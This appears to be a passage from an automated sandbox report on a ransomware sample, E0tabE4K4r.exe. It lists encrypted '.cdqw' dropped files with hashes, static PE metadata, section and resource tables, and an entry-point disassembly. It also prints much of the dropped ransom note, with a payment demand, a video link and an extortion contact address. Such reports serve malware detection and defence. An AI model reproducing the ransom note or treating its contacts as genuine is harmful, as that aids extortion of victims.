                                                                                                                                                  Preview:05-10.X..*n..d?......Q{18...c.J..2.f.......$.>!...P.:..5.^...[..l~Z..C....Z&.4#.9....v.p...}j...~..o}..<YI..._m.~.t..f..*h..`..q5^.+.7.;."...^i.G.P.T.*.\1^`:...........`...[.:.glP.K8.0..Kg#]'...'......"...R=!.ABp... ....V...S..."....]@..c...<". ......Q..v....??Y.Wd'.>T.@hG....*.(........?.'.<F....~s..s.V..C.T........tlBe..=...[..k..i.....i.M...TTk....s%...:+...............sT`..........e.....}.7..:....UG;."&...V.........-....p...{O...{...N......=P...y-@.V. ).,Z...O3i........D..[...U..R..,...+.J...$....z..O..yE.B.Hf...:..lP.4.....?.;.M...>tD.L2.L...1Y.iM.c=.r.xV...9...s.'xe...rbu..SZ.+a...a...G...T....9.......of.f)n6N...C]I.-.JN.0.../(,.E....N.{....Z_....cI.(.@......t..vn..^.N.H...n...(5..R...'.y...CZ$..(...gf.u."....N.?...e]...Tu.....E....ru......Iw.0..y....."......O...L..h.....P.zW-...Kz.t..I.08..k..^..v..e.iqX.Gx........h~..R..1........{..o.....|V...X..v?.+C.&..5!..|Nc...3..Y......x.p$...Vn.c...U|.R#..m.p:.KId...^x.A..P.@H..AoW.4...

                                                                                                                                                  C:\Users\user\Local Settings\Temp\wmsetup.log.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1031
                                                                                                                                                  Entropy (8bit):7.777753916344055
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:tgwv13erwc8Q7DaqTkINUxuzzkvz3T25vcle85n+Fnf2bD:Oci8NcRNUAzzkvv2mMn8D
                                                                                                                                                  MD5:EB9C09D8D03D8912478B7EDEE8902700
                                                                                                                                                  SHA1:D0373ADCD36A47CE03BD647F4839DB6922A991B7
                                                                                                                                                  SHA-256:0369AF018203D396C0677AEFBB1C4F5F381BF5FC3C2F1E1493EB2AEE872C7B3A
                                                                                                                                                  SHA-512:C04E7AA7E899D94948776F45CF57A95B332DA9A6CCCA9C744F610D0F67F1F8F3A8C806738AF01F3C3B1CC1E42398B4404E55EE74A6B21A62D0B250F81D07546A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:..[*Wa...oo...bA[.=....t..WI....J..`.<..P._....<..JGa.......[..-j..o.z.C.:.GX.. .U.\.?..`.Ij'?>JL.6..Sz..W.3:.}CPS.&..(K.T=.I..cX#..t...$l......;h..C8*...-..A5Y.q^D.....=.?=...R.......)..c...j....;.....`..[...S;.)....U..hr.*&R.8o~B=...>..7nK3..s.I.O.^Z..lT........vR.B6...?.M...n.s.]..a..t....7...5......FK.i.2..i;...@.........].h..../H.y<HY.X.....S...eM....:."....@..y......;.2..<..H.Q.U`.7.+........c....s...4.....z"./..g.*.....5.d'.xN..MT<.?.....1t.bv.>.;.c.. ..|Tdy.o.f..A.....o..F..q.9....a#...f.w..@....-B.o..6=L......../...E.e.......h.8..f%Z,>....L0VX..w/.KGXow.3.?y..:.t UY..dB..2..C.....tNAQ.'.....N.^.fXv0s4Xa..%s..tF........n..'y.>-v...:.4a:.H=\w.a~k......O....uLh.U.,Qy...@....X.F....."B.....`.....,6Y..Hi.0hk...9.j..z!.......T...0.i..m......o.KQKO.l..).p...r..\.a\.....9...6.\%z.#)B.).....~<..........'^..t.x.b..x"z"..|....W.....]..o...GR.AU.<....i.].<.I=h...m.../.M`.8.Q.0s.*...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698

                                                                                                                                                  C:\Users\user\Local Settings\Temp\{40EDAAB0-8A3E-4575-8B64-F20B6714F07D}.png.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):6130
                                                                                                                                                  Entropy (8bit):7.971599445379854
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:QY0InD80yI8Ukg7qlagWE0ExQ8Evyyid1V0pQZ6s2woME/Oyd/IL:QYZD2GEnmJyJeIjbOOW/S
                                                                                                                                                  MD5:A2AAFCB1E81E9CF69045B421FDA9AE5C
                                                                                                                                                  SHA1:AD971C078911F46B0D138FBD00DD05AB30F00A8D
                                                                                                                                                  SHA-256:E51FEE1694F428691C49D8EC6C5E6233AE1322FE1F6A11AD83DFD6BFBB3887AA
                                                                                                                                                  SHA-512:3FB3291960459F91C072E9F7848C377B9E745C8733884BA11086F2836C91D02E0545B56411A3CABA20A90E2AE113499F3081DAEF5C3C6CC92B6A9067E2B9D7A6
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.PNG..U.f..y.Vj... ......5..[...C..d..1..A....`T.s..)...I.LY..(E...GC....q.(x]..P..#/D.v&.........G.R..4[....i.. .......l.'v.....Xe...k...+.....H.K....I.d.r..q...<un.C....q.l..#...i..6>9...~....[....6....z.{...RR...M.q.w.......]2...u......WVn..I..6>..w.....L....*...kQ..E..q.2.LH..........k.Pa..IL..V)[...X.9~.1:.P=.."...XZ...K0.....L.Hn...#.r.w......4..vZ.a?.i8[Z#.D..Va.ct.av..!..@...g.1F..Dc!.5:7.r.....W.u. .....oQ.......\.H..D..=o.......E..=.:.X>...{.v.pVu_)..*J.l....#xM.1...g}*..g.)...=O;.a.#..}.>4.1..6.K.'./y.fc a..A.,g58.%(..5..u.%b.c.T.|....`......:...[.Lkg.W+>>-...^.4O......{..&....3I.4`..*.g_.jFo@.s2...bU.$.O`..f..V.O8......>.:\.1...fVB....$Z(#{$......%..3...Z..|9..&LvW...g9.q&:u...|W..3~.L....y...;.A.g.pp..42.........:.F..px..8.vR.,..\.S. ......mFur..T.x...h...o..I.L.f.b."..-).....e...3P....>.o,.!...?lUm...w....4K....w1...GG_5.h.n.,..c..}.u.....a.7Z.-.=T.WHNG^....j9..p.....WG...5.......X..>....c.q.....=&...{.~.."..Rok.a\9.`t..a..z.Z<..\..

                                                                                                                                                  C:\Users\user\Local Settings\Temp\{561F9F4C-5906-4D4D-8807-06CDEFA19E59}.png.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):6130
                                                                                                                                                  Entropy (8bit):7.968845782550198
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:KCfQTFyMQ4BJQcX3MXDgv7L53xHUxvfdRjq9U3PqL/yOhErbm9sQx5og+PHtW7Qw:KCf29yI0Dgv7jHUBfdBEU3PyLEfm9sQH
                                                                                                                                                  MD5:6B936A07CD5B8A6FC04DB5E109F67390
                                                                                                                                                  SHA1:63F0D26C658D4C0542E04FF1A93872BE75FCD6AD
                                                                                                                                                  SHA-256:789961A4CE1811245F32EFC812675CA6ACD7279901429381BE20A87C86615FE6
                                                                                                                                                  SHA-512:385769120D98EE1D115B6238BFD3BB962B0C1151FD3A8D5762A785256B25F0270418E03BC9CF2D9063160376EE33A1212FDB56D99D7751FC92636B4AAA74D691
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.PNG...{_:.V.*uT.......d../l.j...d.b.98*..[.vb{AaO..".C.| ..xY1(.&.5_f7.u.D..m.e..$6S...`_..h..f.....a...nN..*...#'u.BoT...%"..G..27x{\.U._.E%..YT;^.....y......-Z.......#C.I2..X..E~.....d.S......r...I%..[...`3L.i..Vv...)9<..{@..$...(....fV,IU.f.....A.:.@....l.k...z(.*....W.hlI....O...V....f...df..F.~....N..^io.!..S7...3P@....r....YS.}.P.."...m.@....y. C.}.. ^HB..1F.E...KX..\3?.I.z......6.e1g..WI.....6.*+.m.0_.YL....Qv.v....[h{.........v..b.R.@du..o.z....@..n+KsMO:$d...YyDuW..y.S&....1E.!.(r%..(..l.N...n...z-@A%..l.....8.....;...;p...I..0....R...c...O.wp.Ud.Q...M1..XJ.K................tR[.6.TsRE].........J)..K3...g..r(S.r!.)...g..<..u...Y..a~.k.W.D!k.qh...^..g.v.kW.&.x....8..j...^.....X..8.4{ow.....o:...^..;b/.l..%..%..d.YiZ...5W..."m.n.u.qo~alg$)m.....f...c..-...Q....;...xmg;`@...`.E..Hd0...y..iM...y...%"..z.......'..c5..C....*.Y...$.%......R+....4..5......l7..^....r.@.U.j...7:...$0.F.a."D.1..=.J^."..J:.S^....3z...,Y[y.....4]

                                                                                                                                                  C:\Users\user\Searches\winrt--{S-1-5-21-2246122658-3693405117-2476756634-1003}-.searchconnector-ms

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1193
                                                                                                                                                  Entropy (8bit):7.841359553432087
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:XxGvp5/sBKHHvyDGXg2aS6lCO5sxAJcx4RN84Ds5lsJGaoPs7kVpI1V2bD:XW5lngGXNaS6h5sx9GN8tWBEcIp3D
                                                                                                                                                  MD5:2C5F3A38D5729C199AB9E8596CC61712
                                                                                                                                                  SHA1:2EC21F00E10C9AE6C2E8B9C29237C822CAB5174E
                                                                                                                                                  SHA-256:882D348B1D275ED0A132867C5807408BFCEDE1B94F262F8E010D73FEF5512068
                                                                                                                                                  SHA-512:CDB2614DA06EB5ABF84355E548AF4B75153E59619279EEDEDEA7BAA86A5D29FE8A262FF9851190F21BB6387679A76496E038D1BF209AF6006859BBB9C4F0CD11
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...*....a....v..........b.H.{.kn$.kX...t..c...4.........c.f..6....a.l..T.`..~.F....Ph=...B..........@k...:..u&.4.px3.......9P....|.....0$<....g.6.`.,..."...h5.Uu..J,o..@.6.>..}a..\.Z0~.!...8x.,Y.....d{...1.....(...@..]..LA.R+[.5..V..H..V..r....K....`...H..;.!.o(.."@.k...Xy....Z...%.*....*I..5.U...A.....p..f..)P.[..O|0.;..tjM..c..3....".D...^..3.....20.....C ..11Q.....j...-4.p.W}E..oo;..=....1......q.@.ei.gz.."&..B5P...=../^.{....d...v.....$.*..v{..8z...p9....I"C..-Gf..;G.'}..;N..gbi.U[.N6.D ...3t9.#.h.M.....4W.....C...0.6-..(.....9.au..}o._..=..,.U...~....|....'v........!....6.KJ...z.>atX..6^..<i.{mm........m.2.e./......p.Aq..23.G#..8....H-|.D0.i^......6J........#,59...#iqA....M.c..c.K(l.m..O!...L?....j$....`.$r....,dh.B.....p.=.u..gES1.....t.......N..C.Cl..\.......J..7R..f.b.{ ....!.8...j.!.B#p.....ib..M3fl..O....k/..EJ...&...=....(_.....-P'O.vEk....-u...R.....mj....R9.(V..).H$7.^..*L..-w.:..MN.h.b;q...u\.g.....,6.K.C=,.j...Sa.s

                                                                                                                                                  C:\Users\user\Searches\winrt--{S-1-5-21-2246122658-3693405117-2476756634-1003}-.searchconnector-ms.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1193
                                                                                                                                                  Entropy (8bit):7.841359553432087
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:XxGvp5/sBKHHvyDGXg2aS6lCO5sxAJcx4RN84Ds5lsJGaoPs7kVpI1V2bD:XW5lngGXNaS6h5sx9GN8tWBEcIp3D
                                                                                                                                                  MD5:2C5F3A38D5729C199AB9E8596CC61712
                                                                                                                                                  SHA1:2EC21F00E10C9AE6C2E8B9C29237C822CAB5174E
                                                                                                                                                  SHA-256:882D348B1D275ED0A132867C5807408BFCEDE1B94F262F8E010D73FEF5512068
                                                                                                                                                  SHA-512:CDB2614DA06EB5ABF84355E548AF4B75153E59619279EEDEDEA7BAA86A5D29FE8A262FF9851190F21BB6387679A76496E038D1BF209AF6006859BBB9C4F0CD11
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...*....a....v..........b.H.{.kn$.kX...t..c...4.........c.f..6....a.l..T.`..~.F....Ph=...B..........@k...:..u&.4.px3.......9P....|.....0$<....g.6.`.,..."...h5.Uu..J,o..@.6.>..}a..\.Z0~.!...8x.,Y.....d{...1.....(...@..]..LA.R+[.5..V..H..V..r....K....`...H..;.!.o(.."@.k...Xy....Z...%.*....*I..5.U...A.....p..f..)P.[..O|0.;..tjM..c..3....".D...^..3.....20.....C ..11Q.....j...-4.p.W}E..oo;..=....1......q.@.ei.gz.."&..B5P...=../^.{....d...v.....$.*..v{..8z...p9....I"C..-Gf..;G.'}..;N..gbi.U[.N6.D ...3t9.#.h.M.....4W.....C...0.6-..(.....9.au..}o._..=..,.U...~....|....'v........!....6.KJ...z.>atX..6^..<i.{mm........m.2.e./......p.Aq..23.G#..8....H-|.D0.i^......6J........#,59...#iqA....M.c..c.K(l.m..O!...L?....j$....`.$r....,dh.B.....p.=.u..gES1.....t.......N..C.Cl..\.......J..7R..f.b.{ ....!.8...j.!.B#p.....ib..M3fl..O....k/..EJ...&...=....(_.....-P'O.vEk....-u...R.....mj....R9.(V..).H$7.^..*L..-w.:..MN.h.b;q...u\.g.....,6.K.C=,.j...Sa.s

                                                                                                                                                  C:\Users\user\_readme.txt

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1120
                                                                                                                                                  Entropy (8bit):4.8813841704398335
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYLuW4mFRqrn6324kA+GT/kF5M2/kJw3RJDYU:WZHfv0p6W4Pn42rDGT0f/kip
                                                                                                                                                  MD5:822BB4480CCD5A254FEFFEB5165B81CA
                                                                                                                                                  SHA1:E13D49EF6F766A96EA95B7C114BD6515BD17B9FD
                                                                                                                                                  SHA-256:0731CBE58944CED1C2B98A4F2E299560B9461E47F3FA528E2183379EC698EF30
                                                                                                                                                  SHA-512:E9F961BC43076F67D30976118863D3A79F840E169E8485E708C927D6B864D0559EDC48B36BC74CC1C6FBA6722D5A42F53052BFB12AF3698AD632CBBD08818B78
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...You can get and look video overview decrypt tool:..https://we.tl/t-99MNqXMrdS..Price of private key and decrypt software is $1999...Discount 50% available if you contact us first 72 hours, that's price for you is $999...Please note that you'll never restore your data without payment...Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.......To get this software you need write on our e-mail:..support@freshingmail.top....Reserve e-mail addr

                                                                                                                                                  Static File Info

                                                                                                                                                  General

                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Entropy (8bit):7.7593539524615975
                                                                                                                                                  TrID:
                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                  File name:E0tabE4K4r.exe
                                                                                                                                                  File size:838'656 bytes
                                                                                                                                                  MD5:9de69c7a3e551dcbc9208221099680a7
                                                                                                                                                  SHA1:e5ae2554407774c2cbbdde1c1dca1b15d51b6d20
                                                                                                                                                  SHA256:9a880d7572486dd985ed6ffbf55eee8875077d9614befc12d5fbdaafd45e86d5
                                                                                                                                                  SHA512:d5bd138d9caf008504b9ee9e2186e38cd1df05f6fbf2dcf0e26ca7bb63f7be8bc87febff4082ad29bad5bcfb3c4e91a715942152d5f8b101677111b904ab8630
                                                                                                                                                  SSDEEP:24576:Danoo9lgJSVadwqRPFOwbl3JeknVz4SZSVXYcXywbp:DablggMWHknVz57c
                                                                                                                                                  TLSH:4205F11072ECD032E2F315354634C7F44ABBB872A969597FAA9426691E70FD1DA3033B
                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........................................(...........................................Rich............................PE..L...{.xd...

                                                                                                                                                  File Icon

                                                                                                                                                  Icon Hash:0b3164646d311f46

                                                                                                                                                  Static PE Info

                                                                                                                                                  General

                                                                                                                                                  Entrypoint:0x401d4d
                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                  Digitally signed:false
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                  DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                  Time Stamp:0x6478F17B [Thu Jun 1 19:28:59 2023 UTC]
                                                                                                                                                  TLS Callbacks:
                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                  OS Version Major:5
                                                                                                                                                  OS Version Minor:0
                                                                                                                                                  File Version Major:5
                                                                                                                                                  File Version Minor:0
                                                                                                                                                  Subsystem Version Major:5
                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                  Import Hash:a2a0817e6392d97a0384682bfc79e3d7

                                                                                                                                                  Entrypoint Preview

                                                                                                                                                  Instruction
                                                                                                                                                  call 00007FE81CF908EFh
                                                                                                                                                  jmp 00007FE81CF8653Eh
                                                                                                                                                  mov edi, edi
                                                                                                                                                  push ebp
                                                                                                                                                  mov ebp, esp
                                                                                                                                                  sub esp, 00000328h
                                                                                                                                                  mov dword ptr [004BB1D8h], eax
                                                                                                                                                  mov dword ptr [004BB1D4h], ecx
                                                                                                                                                  mov dword ptr [004BB1D0h], edx
                                                                                                                                                  mov dword ptr [004BB1CCh], ebx
                                                                                                                                                  mov dword ptr [004BB1C8h], esi
                                                                                                                                                  mov dword ptr [004BB1C4h], edi
                                                                                                                                                  mov word ptr [004BB1F0h], ss
                                                                                                                                                  mov word ptr [004BB1E4h], cs
                                                                                                                                                  mov word ptr [004BB1C0h], ds
                                                                                                                                                  mov word ptr [004BB1BCh], es
                                                                                                                                                  mov word ptr [004BB1B8h], fs
                                                                                                                                                  mov word ptr [004BB1B4h], gs
                                                                                                                                                  pushfd
                                                                                                                                                  pop dword ptr [004BB1E8h]
                                                                                                                                                  mov eax, dword ptr [ebp+00h]
                                                                                                                                                  mov dword ptr [004BB1DCh], eax
                                                                                                                                                  mov eax, dword ptr [ebp+04h]
                                                                                                                                                  mov dword ptr [004BB1E0h], eax
                                                                                                                                                  lea eax, dword ptr [ebp+08h]
                                                                                                                                                  mov dword ptr [004BB1ECh], eax
                                                                                                                                                  mov eax, dword ptr [ebp-00000320h]
                                                                                                                                                  mov dword ptr [004BB128h], 00010001h
                                                                                                                                                  mov eax, dword ptr [004BB1E0h]
                                                                                                                                                  mov dword ptr [004BB0DCh], eax
                                                                                                                                                  mov dword ptr [004BB0D0h], C0000409h
                                                                                                                                                  mov dword ptr [004BB0D4h], 00000001h
                                                                                                                                                  mov eax, dword ptr [004B9004h]
                                                                                                                                                  mov dword ptr [ebp-00000328h], eax
                                                                                                                                                  mov eax, dword ptr [004B9008h]
                                                                                                                                                  mov dword ptr [ebp-00000324h], eax
                                                                                                                                                  call dword ptr [000000D4h]

                                                                                                                                                  Rich Headers

                                                                                                                                                  Programming Language:
                                                                                                                                                  • [C++] VS2008 build 21022
                                                                                                                                                  • [ASM] VS2008 build 21022
                                                                                                                                                  • [ C ] VS2008 build 21022
                                                                                                                                                  • [IMP] VS2005 build 50727
                                                                                                                                                  • [RES] VS2008 build 21022
                                                                                                                                                  • [LNK] VS2008 build 21022

                                                                                                                                                  Data Directories

                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xb7a5c0x3c.rdata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xc10000x13180.rsrc
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb72f00x40.rdata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0xb50000x1f0.rdata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                  Sections

                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                  .text0x10000xb39c40xb3a00False0.910385949460682data7.913334499786812IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                  .rdata0xb50000x358a0x3600False0.39359085648148145data5.455534152662504IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                  .data0xb90000x65a80x2400False0.19661458333333334data2.086431713174177IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                  .puyihi0xc00000xc0x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                  .rsrc0xc10000x131800x13200False0.5555044934640523data5.740822263746324IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                  Resources

                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                  RT_CURSOR0xce9000x134Targa image data - Map 64 x 65536 x 1 +32 "\001"SetsuanaSouth Africa0.43506493506493504
                                                                                                                                                  RT_CURSOR0xcea500xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SetsuanaSouth Africa0.30810234541577824
                                                                                                                                                  RT_CURSOR0xcf8f80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SetsuanaSouth Africa0.48014440433212996
                                                                                                                                                  RT_ICON0xc18500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SetsuanaSouth Africa0.7945590994371482
                                                                                                                                                  RT_ICON0xc29100xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SetsuanaSouth Africa0.4554904051172708
                                                                                                                                                  RT_ICON0xc37b80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SetsuanaSouth Africa0.598826714801444
                                                                                                                                                  RT_ICON0xc40600x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0SetsuanaSouth Africa0.6745391705069125
                                                                                                                                                  RT_ICON0xc47280x568Device independent bitmap graphic, 16 x 32 x 8, image size 0SetsuanaSouth Africa0.759393063583815
                                                                                                                                                  RT_ICON0xc4c900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SetsuanaSouth Africa0.5871369294605809
                                                                                                                                                  RT_ICON0xc72380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SetsuanaSouth Africa0.6444652908067542
                                                                                                                                                  RT_ICON0xc82e00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0SetsuanaSouth Africa0.7385245901639345
                                                                                                                                                  RT_ICON0xc8c680x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SetsuanaSouth Africa0.7898936170212766
                                                                                                                                                  RT_ICON0xc91480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SetsuanaSouth Africa0.46748400852878463
                                                                                                                                                  RT_ICON0xc9ff00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SetsuanaSouth Africa0.6416967509025271
                                                                                                                                                  RT_ICON0xca8980x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0SetsuanaSouth Africa0.7171658986175116
                                                                                                                                                  RT_ICON0xcaf600x568Device independent bitmap graphic, 16 x 32 x 8, image size 0SetsuanaSouth Africa0.7810693641618497
                                                                                                                                                  RT_ICON0xcb4c80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SetsuanaSouth Africa0.6453319502074689
                                                                                                                                                  RT_ICON0xcda700x988Device independent bitmap graphic, 24 x 48 x 32, image size 0SetsuanaSouth Africa0.7598360655737705
                                                                                                                                                  RT_ICON0xce3f80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SetsuanaSouth Africa0.8430851063829787
                                                                                                                                                  RT_DIALOG0xd03a80x98dataSetsuanaSouth Africa0.75
                                                                                                                                                  RT_STRING0xd04400x53cdataSetsuanaSouth Africa0.4246268656716418
                                                                                                                                                  RT_STRING0xd09800x616dataSetsuanaSouth Africa0.43324775353016687
                                                                                                                                                  RT_STRING0xd0f980x66cdataSetsuanaSouth Africa0.4367396593673966
                                                                                                                                                  RT_STRING0xd16080x806dataSetsuanaSouth Africa0.4133398247322298
                                                                                                                                                  RT_STRING0xd1e100x540dataSetsuanaSouth Africa0.4419642857142857
                                                                                                                                                  RT_STRING0xd23500x1a8dataSetsuanaSouth Africa0.49056603773584906
                                                                                                                                                  RT_STRING0xd24f80x6d8dataSetsuanaSouth Africa0.4223744292237443
                                                                                                                                                  RT_STRING0xd2bd00xccdataSetsuanaSouth Africa0.5588235294117647
                                                                                                                                                  RT_STRING0xd2ca00x816dataSetsuanaSouth Africa0.41594202898550725
                                                                                                                                                  RT_STRING0xd34b80x5a0dataSetsuanaSouth Africa0.4479166666666667
                                                                                                                                                  RT_STRING0xd3a580x442dataSetsuanaSouth Africa0.45688073394495415
                                                                                                                                                  RT_STRING0xd3ea00x240Matlab v4 mat-file (little endian) , numeric, rows 0, columns 0SetsuanaSouth Africa0.5017361111111112
                                                                                                                                                  RT_STRING0xd40e00x9cdataSetsuanaSouth Africa0.5897435897435898
                                                                                                                                                  RT_ACCELERATOR0xce8c80x38dataSetsuanaSouth Africa0.9107142857142857
                                                                                                                                                  RT_GROUP_CURSOR0xcea380x14Lotus unknown worksheet or configuration, revision 0x1SetsuanaSouth Africa1.3
                                                                                                                                                  RT_GROUP_CURSOR0xd01a00x22dataSetsuanaSouth Africa1.0294117647058822
                                                                                                                                                  RT_GROUP_ICON0xc28f80x14dataSetsuanaSouth Africa1.1
                                                                                                                                                  RT_GROUP_ICON0xc90d00x76dataSetsuanaSouth Africa0.6694915254237288
                                                                                                                                                  RT_GROUP_ICON0xce8600x68dataSetsuanaSouth Africa0.7019230769230769
                                                                                                                                                  RT_VERSION0xd01c80x1dcdataSetsuanaSouth Africa0.5882352941176471

                                                                                                                                                  Imports

                                                                                                                                                  DLLImport
